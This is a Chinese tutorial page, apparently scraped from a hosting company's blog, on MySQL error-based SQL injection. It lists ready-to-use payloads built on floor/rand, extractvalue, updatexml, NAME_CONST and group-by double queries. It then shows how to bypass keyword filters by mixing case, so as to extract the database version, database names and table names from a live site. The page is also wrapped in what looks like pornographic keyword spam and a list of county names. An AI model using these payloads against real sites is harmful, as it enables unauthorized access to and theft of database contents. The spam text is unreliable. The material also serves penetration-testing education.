91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

SQL注入之mysql顯錯注入

發布時間:2020-05-27 20:20:35 來源:網絡 閱讀:7481 作者:eth10 欄目:安全技術

    在我們實際***中,明明發現一個注入點,本以為丟給sqlmap就可以了,結果sqlmap只顯示確實是注入點,但是數據庫卻獲取不了,如圖1所示,這時我們可以使用手工進行注入,判斷出過濾規則以及基本過濾情況,然后再選擇對應的sqlmap腳本(如果有的話),本文主要是講述如何通過mysql函數報錯來進行注入,另外如何使用手工進行全程注入的利用過程,如果你知道sqlmap里面有對應的腳本的話,煩請告知一下,謝謝!。

SQL注入之mysql顯錯注入

圖1 獲取數據庫失敗

    此時我們可以考慮下是否是顯錯注入,對于顯錯注入我們可以使用mysql顯錯注入函數進行查詢數據庫信息。

    通過floor報錯:

and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)
and (select count(*) from (select 1 union select null union select  !1)x group by concat((select version()),floor(rand(0)*2)))

    通過ExtractValue報錯:

and extractvalue(1, concat(0x7f, (select version()),0x7f))

    通過UpdateXml報錯:

and 1=(updatexml(1,concat(0x7f,(select version()),0x7f),1))

    通過NAME_CONST報錯:

and 1=(select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1)) as x)

    通過錯誤的雙重查詢:

or 1 group by concat_ws(0x7f,version(),floor(rand(0)*2)) having min(0) or 1

    在這里我們以UpdateXml報錯進行實戰演示,如圖2是一個顯錯注入點。

SQL注入之mysql顯錯注入

圖2 顯錯注入點

    此時我們將通過UpdateXml來進行SQL注入,這里由于對關鍵字進行了過濾,因此我們需要使用大小寫來進行繞過,首先我們查詢數據庫版本,如圖3所示,成功獲取了數據庫版本。

SQL注入之mysql顯錯注入

圖3 獲取數據庫版本信息

    獲取數據庫名,如圖4所示。

SQL注入之mysql顯錯注入

圖4 獲取數據名

    獲取表名,如圖5所示。

SQL注入之mysql顯錯注入

圖5 獲取表名

    后續操作請參考文章《mysql手工注入》,這里不再進行累贅!

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

麻栗坡县| 鹿泉市| 阳西县| 江门市| 蓬溪县| 临武县| 巴东县| 准格尔旗| 清河县| 金阳县| 浦城县| 大宁县| 宜兰市| 岳阳市| 宁晋县| 宣城市| 黔江区| 页游| 苏尼特右旗| 宕昌县| 泰兴市| 莱州市| 阳春市| 卢氏县| 开江县| 南涧| 沙湾县| 策勒县| 靖边县| 迭部县| 林周县| 眉山市| 岳阳县| 黑山县| 大城县| 威远县| 井冈山市| 高淳县| 康乐县| 天台县| 大埔县|